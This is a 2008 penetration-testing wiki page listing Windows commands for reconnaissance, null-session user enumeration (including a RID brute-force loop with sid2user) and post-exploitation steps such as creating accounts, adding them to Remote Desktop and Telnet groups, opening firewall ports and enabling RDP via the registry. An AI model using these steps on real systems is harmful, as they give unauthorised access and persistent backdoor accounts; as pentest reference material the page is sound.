Windows Commands

From SkullSecurity
Revision as of 20:44, 17 July 2008 by Ron (talk | contribs)
Jump to navigation Jump to search

Recon

nslookup

  • Types of record: NS, A, HINFO, MX, TXT, CNAME, SOA, RP, PTR, SRV
nslookup <site>
  • Interactive mode:
nslookup
> [name or ip]
> server [server ip]
> set type=any
> ls -d [target_domain] [> filename]
> view [filename]
  • No recurse:
> set norecurse
> set recurse

Scanning

tracert

Parameters

  • -d -- don't resolve names
  • -h <N> -- max number of hops (default 30)
  • -j <hostlist> -- use loose source routing
  • -w <N> -- wait for Nms before timing out (default 4000)

Null session

  • Establishing a null session
net use \\<target> "" /u:""
  • Pulling credentials
enum -U <target>
enum -G <target>
  • user2sid
    • Outputs in the form S-X-Y-target_sid-RID
user2sid \\<target> <machine_name>
  • sid2user
    • Requires spaces instead of dashes
sid2user \\<target> 5 <target_sid> <N>
for /L %i in (1000, 1, 1050) do @sid2user \\<target> 5 <target_sid> %i

Exploitation

Finding client-side programs

dir /s "c:\Program Files"
dir /s /b "c:\Program Files\*.exe"

Service interaction

sc query &

Starting telnet 

sc query tlntsvr
sc config tlntsvr start= auto
sc start tlntsvr

Starting terminal services 

sc query termservice
sc config termservice start= auto
sc start termservice

===Users and groups===
Listing users
<pre>net user

Creating a user 

net user <username> <password> /add

Listing groups 

net localgroup

Creating a group 

net localgroup <groupname> /add

Adding a user to a group 

net localgroup >groupname< <username> /add

Adding a user to the telnet users group 

net user <username> <password> /add
net localgroup TelnetClients /add
net localgroup TelnetClients <username> /add

Adding a user to the terminal services group
<pre>net localgroup "Remote Desktop Users" <username> /add

===Firewall interaction===
Opening the firewall for telnet
<pre>netsh firewall add portopening protocol = TCP port = 23 name = telnet mode = enable scope = custom addresses = <address>

Opening the firewall for terminal services 

netsh firewall set service type = remotedesktop mode = enable scope = custom addresses = <address>

Opening the firewall for SSH 

netsh firewall add portopening protocol = TCP port = 22 name = sshd mode = enable scope = custom addresses = <address>

Registry interaction

Enabling terminal services 

reg add "hklm\system\currentcontrolset\control\terminal server" /v fdenytsconnections /t reg_dword /d 0

netstat

Finding a port 

netstat -an | find "<port>"
Retrieved from "https://wiki.skullsecurity.org/index.php?title=Windows_Commands&oldid=2176"